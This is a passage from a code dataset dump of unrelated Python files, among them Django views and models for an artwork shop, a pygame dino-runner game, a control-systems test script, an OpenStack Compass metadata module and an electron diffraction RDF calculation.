data)\n","sub_path":"bsb_site.py","file_name":"bsb_site.py","file_ext":"py","file_size_in_byte":11357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"516482167","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom django.template import loader\n# What is the difference between render and HttpResponse?\n\n# def login(request):\n#     latest_question_list = Question.objects.order_by('-pub_date')[:5]\n#     context = {'latest_question_list': latest_question_list}\n#     return render(request, 'polls/index.html', context)\n\n# The render() function takes the request object as its first argument, a template\n# name as its second argument, and a context dictionary as an optional third argument.\n# It returns an HttpResponse object of the given template rendered with that context.\n\ndef main(request):\n    template = loader.get_template('main/main.html')\n    context = {\n        'testData' : \"testData is testData\"\n    }\n    return HttpResponse(template.render(context, request))\n\n\ndef login(request):\n    template = loader.get_template('login/login.html')\n    context = {\n        'testData' : \"testData is testData\"\n    }\n    return HttpResponse(template.render(context, request))\n\ndef register(request):\n    template = loader.get_template('login/register.html')\n    context = {\n        'testData' : \"testData is testData\"\n    }\n    return HttpResponse(template.render(context, request))\n\ndef mypage(request):\n    template = loader.get_template('mypage/mypage.html')\n    context = {\n        'testData' : \"testData is testData\"\n    }\n    return HttpResponse(template.render(context, request))\n","sub_path":"config/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"552052800","text":"#!/usr/bin/env python\n\n\ndef insertion_sort(li):\n    \"\"\"Return sorted list using the insertion_sort algorithm.\n\n    Worst time complexity: O(n^2)\n    Best time complexity: O(n)\n    \"\"\"\n    for i in range(1, len(li)):\n        j = i\n        key = li[i]\n        while j > 0 and li[j - 1] > key:\n            li[j] = li[j - 1]\n            j = j - 1\n        li[j] = key\n\n    return li\n\n\n# Test the program\n# -----------------\nprint(insertion_sort([15, 5, 10, 2, 6]))\n","sub_path":"askme/questions/Python/algorithms/insertion_sort/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"309781289","text":"from bartez import boards\nfrom bartez.crossword import Crossworld\nfrom bartez.crossword import SquareValues\nfrom bartez.solver import CrosswordSolver\nfrom bartez.word_dictionary import Dictionary\n\n\ndef get_dictionary():\n    return Dictionary(\"italian\", \"words_test_corriere.txt\")\n\n\ndef main():\n    dictionary = get_dictionary()\n    print(\"done\")\n    print(\"words count: \", dictionary.get_words_count())\n    board, geometry = boards.get_default_board()\n    crossword = Crossworld(geometry[0], geometry[1])\n\n    for p in board:\n        r, c = p[0], p[1]\n        crossword.set_value(r, c, SquareValues.block)\n\n    crossword.prepare()\n    crossword.print_crossword()\n\n    solver = CrosswordSolver(dictionary, crossword)\n    solver.run()\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"bartez/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"523705398","text":"# -*- coding: utf-8 -*-\nfrom django.db import models\nfrom django.utils.html import format_html\n\nfrom stock.models import UnitStock\n\n\nclass Option(models.Model):\n    
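\"\"\"Size/print option for an artwork. Saving a fully specified option creates a matching UnitStock row, then resets the entry fields.\"\"\"\n\n    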
USD = 'USD'\n    EUR = 'EUR'\n    KRW = 'KRW'\n    CURRENCY_CHOICES = (\n        (USD, 'USD'),\n        (EUR, 'EUR'),\n        (KRW, 'KRW'),\n    )\n    artwork = models.OneToOneField(\n        'artwork.Artwork', verbose_name='해당제품', related_name='artwork_option')\n    print_choice = models.ForeignKey(\n        'artwork.PrintType', verbose_name='인쇄방식', null=True, blank=True)\n    width = models.FloatField(verbose_name='가로', default=0,\n                              help_text='* 인치로 입력해 주세요. 센치로 입력을 원할 경우, KRW 선택, 실제 판매가 입력')\n    height = models.FloatField(verbose_name='세로', default=0,\n                               help_text='* 인치로 입력해 주세요. 센치로 입력을 원할 경우, KRW 선택, 실제 판매가 입력')\n    currency = models.CharField(\n        verbose_name='통화타입', max_length=8, choices=CURRENCY_CHOICES, default=USD, help_text='* 완제품, 반품액자일 경우만 KRW를 선택해 주세요.')\n    im_price = models.FloatField(verbose_name='업체 판매가', default=0,\n                                 help_text='* 완제 및 반품액자는 KRW 선택 후, 판매가격 입력')\n\n    class Meta:\n        db_table = 'option_manager'\n        verbose_name = '옵션'\n        verbose_name_plural = '수입그림(옵션) 관리'\n\n    def __unicode__(self):\n        return self.artwork.title\n\n    def save(self, *args, **kwargs):\n        is_new = True if not self.id else False\n        super(Option, self).save(*args, **kwargs)\n        if not is_new:\n            if not self.width == 0 and not self.height == 0 and not self.im_price == 0 and self.print_choice:\n                # option codes get a 1001-based suffix, so the first unit becomes '<code>_001'\n                artwork_code = self.artwork.artwork_code\n                num = str(len(UnitStock.objects.filter(option=self)) + 1001)\n                num_id = num[1:]\n                op_code = artwork_code + '_' + num_id\n                if self.currency == 'KRW':\n                    w_size = self.width\n                    h_size = self.height\n                    price = self.im_price\n                else:\n                    w_size = round(float(self.width) * 2.54, 1)\n                    h_size = round(float(self.height) * 2.54, 1)\n                    price = round(float(\n                        self.im_price) * self.artwork.related_com.math_rule * self.artwork.related_com.applied_curr, -3)\n\n                op_unit = UnitStock(option=self)\n                op_unit.option_code = op_code\n                op_unit.print_selected = self.print_choice.title\n                op_unit.width_cm = w_size\n                op_unit.height_cm = h_size\n                op_unit.im_price_info = self.currency + ' ' + str(self.im_price)\n                op_unit.price = price\n                op_unit.order = 999\n                op_unit.save()\n\n                self.width = 0\n                self.height = 0\n                self.im_price = 0\n                self.save(\n                    update_fields=['print_choice', 'width', 'height', 'im_price'])\n\n                option_prices = []\n                option_units = UnitStock.objects.filter(option=self)\n                if option_units:\n                    for ou in option_units:\n                        option_prices.append(ou.price)\n\n                pp = min(option_prices)\n                pick_unit = UnitStock.objects.filter(option=self, price=pp)[0]\n                self.artwork.min_w_cm = pick_unit.width_cm\n                self.artwork.min_h_cm = pick_unit.height_cm\n                self.artwork.min_a_price = pick_unit.price\n                self.artwork.save(\n                    update_fields=['min_w_cm', 'min_h_cm', 'min_a_price'])\n\n    def code_and_id(self):\n        return format_html(u'%s<br/>ID: %s' % (self.artwork.artwork_code, self.artwork.id))\n\n    def image_thumb(self):\n        if not self.artwork.image:\n            return format_html(u'이미지없음')\n        else:\n            return format_html('<a href=\"%s\"><img src=\"%s\" alt=\"product_images\"/></a>' % (self.artwork.image.url, self.artwork.image.url))\n\n    def artwork_info(self):\n        if self.artwork.division == 1:\n            division = u'수입그림'\n        elif self.artwork.division == 2:\n            division = u'출력그림'\n        elif self.artwork.division == 3:\n            division = u'반품액자'\n        else:\n            division = u'완제품'\n\n        return format_html(u'%s<br/>%s' % (self.artwork.title, division))\n\n    def artwork_additional(self):\n        if self.artwork.code_from_com:\n            company = self.artwork.code_from_com\n        else:\n            company = ' '\n        if self.artwork.artist:\n            kor = self.artwork.artist.name_kor\n            eng = self.artwork.artist.name_eng\n        else:\n            kor = u'작가 선택전'\n            eng = u'작가 선택전'\n        return format_html('%s - %s<br/>%s<br/>%s' % (self.artwork.related_com.com_code, company, eng, kor))\n\n    def stock_counter(self):\n        if len(UnitStock.objects.filter(option=self)) == 0:\n            return format_html('오류')\n        else:\n            return format_html('%s' % UnitStock.objects.filter(option=self)[0].now_stock)\n\n    def option_counter(self):\n        op_count = len(UnitStock.objects.filter(option=self))\n        return format_html('%s' % op_count)\n\n    def go_back_artwork(self):\n        # change-page link; the URL assumes Django's default /admin/<app>/<model>/<pk>/ layout\n        return format_html('<a href=\"/admin/artwork/artwork/%s/\">작품관리</a>' % (self.artwork.id))\n\n    def option_size_info(self):\n        unit = UnitStock.objects.filter(option=self)\n        if len(unit) == 0:\n            return u'옵션없음'\n        else:\n            unit = UnitStock.objects.filter(option=self)[0]\n            return format_html('%s X %s cm' % (unit.width_cm, unit.height_cm))\n\n    def this_is_sales(self):\n        if self.artwork.on_sales == 1:\n            sales_status = '/static/admin/img/icon-yes.gif'\n        else:\n            sales_status = '/static/admin/img/icon-no.gif'\n\n        return format_html(u'<img src=\"%s\" alt=\"yes_no_sign\"/>' % (sales_status))\n\n    def this_is_active(self):\n        if self.artwork.is_active:\n            active_status = '/static/admin/img/icon-yes.gif'\n        else:\n            active_status = '/static/admin/img/icon-no.gif'\n\n        return format_html(u'<img src=\"%s\" alt=\"yes_no_sign\"/>' % (active_status))\n\n    code_and_id.short_description = '제품코드'\n    code_and_id.allow_tags = True\n    code_and_id.admin_order_field = 'artwork__artwork_code'\n    image_thumb.short_description = '이미지'\n    image_thumb.allow_tags = True\n    artwork_info.short_description = '제품정보'\n    artwork_info.allow_tags = True\n    artwork_additional.short_description = '제품부가정보'\n    artwork_additional.allow_tags = True\n    stock_counter.short_description = '재고'\n    stock_counter.allow_tags = True\n    option_counter.short_description = '옵션 수'\n    option_counter.allow_tags = True\n    go_back_artwork.short_description = '링크'\n    go_back_artwork.allow_tags = True\n    option_size_info.short_description = '사이즈(cm)'\n    option_size_info.allow_tags = True\n    this_is_sales.short_description = '판매'\n    this_is_sales.allow_tags = True\n    this_is_sales.admin_order_field = 'artwork__on_sales'\n    this_is_active.short_description = '전시'\n    this_is_active.allow_tags = True\n    this_is_active.admin_order_field = 'artwork__is_active'\n","sub_path":"option/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"643677887","text":"import pygame\nimport time\nimport random\nfrom objects import *\n\ndisplay_width = 1200\ndisplay_height = 350\nCLOCK_SPEED = 60\n\npygame.init()\n\ngameDisplay = pygame.display.set_mode((display_width,display_height))\npygame.display.set_caption('DinoRun')\nclock = pygame.time.Clock()\n\ndistance = 400\nspeed = 7\n\nbgcolor = (64,202,201)\nfcolor = (244,212,66)\nfloorH = 50\nbaseH = display_height-floorH+4-50\n\nsprites = {} #same layout as spritesI, but holding loaded pygame Surface objects\nspritesI = {\n    \"floor\": [\"sprites/floor.png\"], #1200x12\n    \"clouds\": [\"sprites/clouds.png\"], #46x13\n    \"crouch\": [\"sprites/crouch1.png\",\"sprites/crouch2.png\"], #65x50\n    \"run\": [\"sprites/idle.png\",\"sprites/0legup.png\",\"sprites/1legup.png\"], #50x50 3px LEFT, RIGHT, 2px DOWN, 1 px UP\n    \"bird\": [\"sprites/bird1.png\",\"sprites/bird2.png\"], #46x40\n    \"cactusS\": [\"sprites/cactusS1.png\",\"sprites/cactusS2.png\"], #17x35\n    \"cactusL\": [\"sprites/cactusL1.png\",\"sprites/cactusL2.png\"] #25x48\n}\n\ndef loadAssets():\n    global sprites\n    for x,y in spritesI.items():\n        pom = []\n        sprites[x] = pom\n        for k in y:\n            sprites[x].append(pygame.image.load(k))\n\ndef text_objects(text, font):\n    textSurface = font.render(text, True, (0,0,0))\n    return textSurface, textSurface.get_rect()\n\ndef message_display(text,x,y):\n    largeText = pygame.font.Font('freesansbold.ttf',18)\n    TextSurf, TextRect = text_objects(text, largeText)\n    TextRect = (x,y)\n    gameDisplay.blit(TextSurf, TextRect)\n\ndef draw(smth,x,y):\n    gameDisplay.blit(smth,(x,y))\n\ndef drawBG():\n    pygame.draw.rect(gameDisplay,bgcolor,[0,0,display_width,display_height-floorH])\n    pygame.draw.rect(gameDisplay,fcolor,[0,display_height-floorH,display_width,display_height])\n    draw(sprites[\"floor\"][0],0,display_height-floorH)\n\ndef drawObj(score):\n    
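\"\"\"Draw the obstacles that are on screen, move every obstacle left, and recycle the leading obstacle once it scrolls off.\"\"\"\n    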
draw(sprites[\"cactusL\"][0],x[0]+25*i,baseH)\n if x[1] == 1:\n if x[2]%2 == 0:\n draw(sprites[\"bird\"][(score//5)%2],x[0],baseH-8)\n if x[2]%2 == 1:\n draw(sprites[\"bird\"][(score//5)%2],x[0],baseH-25)\n x[0] -= speed\n if x[0]<-100:\n del objects[0]\n objects.append([objects[-1][0]+distance,random.randrange(2),random.randrange(4)])","sub_path":"drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"21524897","text":"import imp\nfrom casadi import *\nimport numpy as np\nfrom SrdPy import get\nfrom SrdPy.Controllers import LTI_CLQE\nfrom SrdPy.Controllers.Observers.LTI_CLQE import LTI_System\ntol = 10**(-5)\n\n# [0, 0, phi_1, phi_2]\nq = [0, 0, 0, 0]\nv = np.zeros(len(q))\nx = vertcat(q,v)\nu = 0\n\nHandler_dynamics_generalized_coordinates_model = get('handlerGeneralizedCoordinatesModel')\nHandler_dynamics_Linearized_Model = get('handlerLinearizedModel')\nHandler_Constraints_Model = get('handlerConstraints')\n\n\nk = Handler_Constraints_Model.dofConstraint\ndof = Handler_dynamics_generalized_coordinates_model.dofConfigurationSpaceRobot\nm = Handler_dynamics_generalized_coordinates_model.dofControl\n\nH = Handler_dynamics_generalized_coordinates_model.getJointSpaceInertiaMatrix(q)\nc = Handler_dynamics_generalized_coordinates_model.getBiasVector(q, v)\nT = Handler_dynamics_generalized_coordinates_model.getControlMap(q)\n\nF = Handler_Constraints_Model.getJacobian(q)\ndF = Handler_Constraints_Model.getJacobianDerivative(q,v)\n\niH = pinv(H)\nf0 = vertcat(v,iH@(T*u - c))\n\nM = vertcat(horzcat(H, -F.T),\n horzcat(F, SX.zeros(k,k)))\niM = pinv(M)\n\nA = Handler_dynamics_Linearized_Model.getA(q, v, u, iM)\nB = Handler_dynamics_Linearized_Model.getB(q, v, iM)\n\ng = f0 - A @ x - B @ u\n\nG = vertcat(horzcat(SX.zeros(k, dof), F),\n horzcat(F, dF))\n\n\n\nC_case0 = np.array([ 0, 0, 0, 1, 0, 0, 0, 0 ] )\n \nC_case1 = np.array([\n [0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 1, 0],\n [0, 0, 0, 0, 0, 0, 0, 1]])\n \nC_case2 = np.array([\n [1, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 1, 0],\n [0, 0, 0, 0, 0, 0, 0, 1]])\n \nC_case3 = np.array([\n [1, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 1, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 1]])\n\nC_case4 = np.eye(2*dof) \n\nC = C_case1\n \n\nControllerCost = {'Q': 100*np.eye(4), 'R': 1}\nObserverCost = {'Q': 100*np.eye(4), 'R': np.array([[C.shape[0]]])}\nsystem = LTI_System(A, B, C, G, g,ControllerCost, ObserverCost,\n 0.01*np.array([0,0,np.random.randn(),np.random.randn(), 0,0,0,0]), \n 0.01*np.array([0,0,np.random.randn(),np.random.randn(), 0,0,0,0]),\n tol)\n\nOutput = LTI_CLQE(system)\n\n'''\n\nTime = 15\n[TOUT,YOUT] = ode45(Output.closed_loop.z_xi.ode_fnc, [0 Time], Output.closed_loop.z_xi.Y0)\n\nz = YOUT(:, 1:Output.sizes.size_z)\nz_est = YOUT(:, (1+Output.sizes.size_z):(2*Output.sizes.size_z))\nzeta_est = YOUT(:, (1+2*Output.sizes.size_z):(2*Output.sizes.size_z+Output.sizes.size_zeta) )\nx_est = (Output.Matrices.N *z_est' + Output.Matrices.R_used*zeta_est')'\n\nfigure('Color', 'w')\nsubplot(2, 2, 1)\nplot(TOUT, z, 'LineWidth', 1.5) hold on title('z')\nplot([TOUT(1) TOUT(end)], [Output.desired.z_corrected' Output.desired.z_corrected'], '--', 'LineWidth', 0.8)\n\nsubplot(2, 2, 2)\nplot(TOUT, z_est) title('z est')\nsubplot(2, 2, 3)\nif 
~isempty(zeta_est)\n plot(TOUT,zeta_est) title('zeta est')\nend\n\nsubplot(2, 2, 4)\n\nplot(TOUT, x_est, 'LineWidth', 1.5) hold on title('x est')\nplot([TOUT(1) TOUT(end)], [Output.desired.x_corrected' Output.desired.x_corrected'], '--', 'LineWidth', 0.8)\n\n\ndrawnow\n##################################################################\n\n[TOUT,YOUT] = ode45(Output.closed_loop.x_xi.ode_fnc, [0 Time], Output.closed_loop.x_xi.Y0)\n\nx = YOUT(:, 1:Output.sizes.size_x)\nz_est = YOUT(:, (1+Output.sizes.size_x):(Output.sizes.size_x+Output.sizes.size_z))\nzeta_est = YOUT(:, (1+Output.sizes.size_x+Output.sizes.size_z):(Output.sizes.size_x+Output.sizes.size_z+Output.sizes.size_zeta) )\nz_calc = (Output.Matrices.N'*x')'\n\nfigure('Color', 'w')\nsubplot(3, 2, 1)\nplot(TOUT, x, 'LineWidth', 1.5) hold on title('x')\nplot([TOUT(1) TOUT(end)], [Output.desired.x_corrected' Output.desired.x_corrected'], '--', 'LineWidth', 0.8)\n\nsubplot(3, 2, 2)\nplot(TOUT, z_est) title('z est')\nsubplot(3, 2, 3)\n\nif ~isempty(zeta_est)\n plot(TOUT, zeta_est) title('zeta est')\nend\n\nsubplot(3, 2, 4)\nplot(TOUT, z_calc) hold on title('z calc')\nplot([TOUT(1) TOUT(end)], [Output.desired.z_corrected' Output.desired.z_corrected'], '--', 'LineWidth', 0.8)\nsubplot(3, 2, 5)\nplot(TOUT, z-z_calc) title('z-z calc')\n\ndrawnow\n\n'''","sub_path":"examples/MassWheel/test_LTI_CLQE.py","file_name":"test_LTI_CLQE.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"404575896","text":"# Copyright 2014 Huawei Technologies Co. Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Metadata related object holder.\"\"\"\nimport logging\n\nfrom compass.db.api import database\nfrom compass.db.api import metadata as metadata_api\nfrom compass.db.api import permission\nfrom compass.db.api import user as user_api\nfrom compass.db.api import utils\nfrom compass.db import exception\nfrom compass.db import models\nfrom compass.utils import setting_wrapper as setting\nfrom compass.utils import util\n\n\nRESP_METADATA_FIELDS = [\n 'os_config', 'package_config', 'flavor_config'\n]\nRESP_FLAVORS_FIELDS = [\n 'id', 'name', 'display_name', 'template', 'roles'\n]\n\n\n@database.run_in_session()\ndef load_metadatas(session):\n load_os_metadatas_internal(session)\n load_package_metadatas_internal(session)\n load_flavor_metadatas_internal(session)\n\n\ndef load_os_metadatas_internal(session):\n global OS_METADATA_MAPPING\n logging.info('load os metadatas into memory')\n OS_METADATA_MAPPING = metadata_api.get_os_metadatas_internal(session)\n\n\ndef load_package_metadatas_internal(session):\n global PACKAGE_METADATA_MAPPING\n logging.info('load package metadatas into memory')\n PACKAGE_METADATA_MAPPING = (\n metadata_api.get_package_metadatas_internal(session)\n )\n\n\ndef load_flavor_metadatas_internal(session):\n global FLAVOR_METADATA_MAPPING\n logging.info('load flavor metadatas into memory')\n FLAVOR_METADATA_MAPPING = (\n 
metadata_api.get_flavor_metadatas_internal(session)\n )\n\n\nOS_METADATA_MAPPING = {}\nPACKAGE_METADATA_MAPPING = {}\nFLAVOR_METADATA_MAPPING = {}\n\n\ndef _validate_config(\n config, id, id_name, metadata_mapping, whole_check, **kwargs\n):\n if id not in metadata_mapping:\n raise exception.InvalidParameter(\n '%s id %s is not found in metadata mapping' % (id_name, id)\n )\n metadatas = metadata_mapping[id]\n metadata_api.validate_config_internal(\n config, metadatas, whole_check, **kwargs\n )\n\n\ndef validate_os_config(\n session, config, os_id, whole_check=False, **kwargs\n):\n if not OS_METADATA_MAPPING:\n load_os_metadatas_internal(session)\n _validate_config(\n config, os_id, 'os', OS_METADATA_MAPPING,\n whole_check, session=session, **kwargs\n )\n\n\ndef validate_package_config(\n session, config, adapter_id, whole_check=False, **kwargs\n):\n if not PACKAGE_METADATA_MAPPING:\n load_package_metadatas_internal(session)\n _validate_config(\n config, adapter_id, 'adapter', PACKAGE_METADATA_MAPPING,\n whole_check, session=session, **kwargs\n )\n\n\ndef validate_flavor_config(\n session, config, flavor_id, whole_check=False, **kwargs\n):\n if not FLAVOR_METADATA_MAPPING:\n load_flavor_metadatas_internal(session)\n _validate_config(\n config, flavor_id, 'flavor', FLAVOR_METADATA_MAPPING,\n whole_check, session=session, **kwargs\n )\n\n\ndef _filter_metadata(metadata, **kwargs):\n if not isinstance(metadata, dict):\n return metadata\n filtered_metadata = {}\n for key, value in metadata.items():\n if key == '_self':\n filtered_metadata[key] = {\n 'name': value['name'],\n 'description': value.get('description', None),\n 'default_value': value.get('default_value', None),\n 'is_required': value.get('is_required', False),\n 'required_in_whole_config': value.get(\n 'required_in_whole_config', False),\n 'js_validator': value.get('js_validator', None),\n 'options': value.get('options', None),\n 'required_in_options': value.get(\n 'required_in_options', False),\n 'field_type': value.get(\n 'field_type_data', 'str'),\n 'display_type': value.get('display_type', None),\n 'mapping_to': value.get('mapping_to', None)\n }\n else:\n filtered_metadata[key] = _filter_metadata(value, **kwargs)\n return filtered_metadata\n\n\ndef get_package_metadata_internal(session, adapter_id):\n \"\"\"get package metadata internal.\"\"\"\n if not PACKAGE_METADATA_MAPPING:\n load_package_metadatas_internal(session)\n if adapter_id not in PACKAGE_METADATA_MAPPING:\n raise exception.RecordNotExists(\n 'adpater %s does not exist' % adapter_id\n )\n return _filter_metadata(\n PACKAGE_METADATA_MAPPING[adapter_id], session=session\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_METADATAS\n)\n@utils.wrap_to_dict(RESP_METADATA_FIELDS)\ndef get_package_metadata(adapter_id, user=None, session=None, **kwargs):\n return {\n 'package_config': get_package_metadata_internal(session, adapter_id)\n }\n\n\ndef get_flavor_metadata_internal(session, flavor_id):\n \"\"\"get flavor metadata internal.\"\"\"\n if not FLAVOR_METADATA_MAPPING:\n load_flavor_metadatas_internal(session)\n if flavor_id not in FLAVOR_METADATA_MAPPING:\n raise exception.RecordNotExists(\n 'flavor %s does not exist' % flavor_id\n )\n return _filter_metadata(\n FLAVOR_METADATA_MAPPING[flavor_id], session=session\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n 
permission.PERMISSION_LIST_METADATAS\n)\n@utils.wrap_to_dict(RESP_METADATA_FIELDS)\ndef get_flavor_metadata(flavor_id, user=None, session=None, **kwargs):\n return {\n 'flavor_config': get_flavor_metadata_internal(session, flavor_id)\n }\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_METADATAS\n)\n@utils.wrap_to_dict(RESP_FLAVORS_FIELDS)\ndef list_flavors(user=None, session=None, **filters):\n \"\"\"List flavors.\"\"\"\n return utils.list_db_objects(\n session, models.AdapterFlavor, **filters\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_METADATAS\n)\n@utils.wrap_to_dict(RESP_FLAVORS_FIELDS)\ndef get_flavor(flavor_id, user=None, session=None, **kwargs):\n \"\"\"Get flavor.\"\"\"\n return utils.get_db_object(\n session, models.AdapterFlavor, id=flavor_id\n )\n\n\ndef get_os_metadata_internal(session, os_id):\n \"\"\"get os metadata internal.\"\"\"\n if not OS_METADATA_MAPPING:\n load_os_metadatas_internal(session)\n if os_id not in OS_METADATA_MAPPING:\n raise exception.RecordNotExists(\n 'os %s does not exist' % os_id\n )\n return _filter_metadata(\n OS_METADATA_MAPPING[os_id], session=session\n )\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_METADATAS\n)\n@utils.wrap_to_dict(RESP_METADATA_FIELDS)\ndef get_os_metadata(os_id, user=None, session=None, **kwargs):\n \"\"\"get os metadatas.\"\"\"\n return {'os_config': get_os_metadata_internal(session, os_id)}\n\n\ndef get_ui_metadata(metadata, config):\n \"\"\"convert os_metadata to ui os_metadata.\"\"\"\n result_config = {}\n result_config[config['mapped_name']] = []\n for mapped_child in config['mapped_children']:\n data_dict = {}\n for config_key, config_value in mapped_child.items():\n for key, value in config_value.items():\n if 'data' == key:\n result_data = []\n _get_data(metadata[config_key], value, result_data)\n data_dict['data'] = result_data\n else:\n data_dict[key] = value\n result_config[config['mapped_name']].append(data_dict)\n return result_config\n\n\ndef _get_data(metadata, config, result_data):\n data_dict = {}\n for key, config_value in config.items():\n if isinstance(config_value, dict) and key != 'content_data':\n if key in metadata.keys():\n _get_data(metadata[key], config_value, result_data)\n else:\n _get_data(metadata, config_value, result_data)\n elif isinstance(config_value, list):\n option_list = []\n for item in config_value:\n if isinstance(item, dict):\n option_list.append(item)\n data_dict[key] = option_list\n else:\n if isinstance(metadata['_self'][item], bool):\n data_dict[item] = str(metadata['_self'][item]).lower()\n else:\n data_dict[item] = metadata['_self'][item]\n else:\n data_dict[key] = config_value\n if data_dict:\n result_data.append(data_dict)\n return result_data\n\n\n@utils.supported_filters([])\n@database.run_in_session()\n@user_api.check_user_permission_in_session(\n permission.PERMISSION_LIST_METADATAS\n)\n@utils.wrap_to_dict(RESP_METADATA_FIELDS)\ndef get_package_os_metadata(\n adapter_id, os_id,\n user=None, session=None, **kwargs\n):\n from compass.db.api import adapter_holder as adapter_api\n adapter = adapter_api.get_adapter_internal(session, adapter_id)\n os_ids = [os['os_id'] for os in adapter['supported_oses']]\n if os_id not in os_ids:\n raise exception.InvalidParameter(\n 'os %s is not in the supported os list of 
adapter %s' % (\n                os_id, adapter_id\n            )\n        )\n    metadatas = {}\n    metadatas['os_config'] = get_os_metadata_internal(\n        session, os_id\n    )\n    metadatas['package_config'] = get_package_metadata_internal(\n        session, adapter_id\n    )\n    return metadatas\n\n\ndef _autofill_config(\n    config, id, id_name, metadata_mapping, **kwargs\n):\n    if id not in metadata_mapping:\n        raise exception.InvalidParameter(\n            '%s id %s is not found in metadata mapping' % (id_name, id)\n        )\n    metadatas = metadata_mapping[id]\n    logging.debug(\n        'auto fill %s config %s by params %s',\n        id_name, config, kwargs\n    )\n    return metadata_api.autofill_config_internal(\n        config, metadatas, **kwargs\n    )\n\n\ndef autofill_os_config(\n    session, config, os_id, **kwargs\n):\n    if not OS_METADATA_MAPPING:\n        load_os_metadatas_internal(session)\n    return _autofill_config(\n        config, os_id, 'os', OS_METADATA_MAPPING, session=session, **kwargs\n    )\n\n\ndef autofill_package_config(\n    session, config, adapter_id, **kwargs\n):\n    if not PACKAGE_METADATA_MAPPING:\n        load_package_metadatas_internal(session)\n    return _autofill_config(\n        config, adapter_id, 'adapter', PACKAGE_METADATA_MAPPING,\n        session=session, **kwargs\n    )\n","sub_path":"compass/db/api/metadata_holder.py","file_name":"metadata_holder.py","file_ext":"py","file_size_in_byte":11179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"537185135","text":"import numpy as np\nimport definitions\n\nparamK = np.loadtxt(definitions.KIRKLAND_PATH)\nparamL = np.loadtxt(definitions.LOBATO_PATH)\n\n\ndef calculation(ds, px_start_num, px_end_num, element_nums, ratio, azavg, is_full_q, damping, rmax, dr, electron_voltage, fit_at_q=None, N=None, scattering_factor_type=\"Kirkland\", fitting_range=None):\n    assert len(element_nums) == len(ratio)\n    if px_start_num is None or px_start_num == 0:\n        px_start_num = 1\n    if px_end_num is None or px_end_num == 0:\n        px_end_num = len(azavg)\n\n    element_nums = np.array(element_nums)\n    for idx, element in enumerate(element_nums):\n        if element == 0:\n            ratio[idx] = 0\n    element_nums = element_nums[element_nums != 0]\n    ratio = np.array(ratio)\n    ratio = ratio[ratio != 0]\n    e_tot = np.sum(np.array(ratio))\n    e_ratio = ratio / e_tot\n\n    x = np.arange(px_start_num, px_end_num + 1)  # selected x ranges, end point = end point(eRDF) + 1\n    # Iq = azavg[px_start_num-1:px_end_num]  # Indexing number\n    Iq = azavg[px_start_num: px_end_num + 1]\n\n    q = x * ds * 2 * np.pi\n\n    s = q / 2 / np.pi\n    s2 = s ** 2\n\n    if scattering_factor_type == \"Kirkland\":\n        paramK_elems = paramK[element_nums, :]\n        f = np.array([KirklandFactors(s2, paramK_elem) for paramK_elem in paramK_elems])\n    elif scattering_factor_type == \"Lobato\":\n        paramL_elems = paramL[element_nums, :]\n        f = np.array([LobatoFactors(s2, paramL_elem) for paramL_elem in paramL_elems])\n    f = f * calculate_relativistic(electron_voltage)\n\n    fq = np.sum(f * e_ratio[:, None], axis=0)\n    fq_sq = fq ** 2\n    gq = np.sum(f ** 2 * e_ratio[:, None], axis=0)\n\n    L = np.uint16(len(q))\n    # if is_full_q:\n    #     AFrange = 0\n    # else:\n    #     AFrange = int(2 / 3 * L)\n\n    wi = np.ones((L))\n    if fitting_range is not None:\n        # wi = np.ones((L, 1))\n        wi = np.zeros((L))\n        # wi[0:AFrange] = 0\n        q_to_x_factor = 1 / (ds * 2 * np.pi)\n        l = int(np.round(q_to_x_factor * fitting_range[0]))\n        r = int(np.round(q_to_x_factor * fitting_range[1]))\n        wi[l:r] = 1\n\n    # added code\n    if fit_at_q is 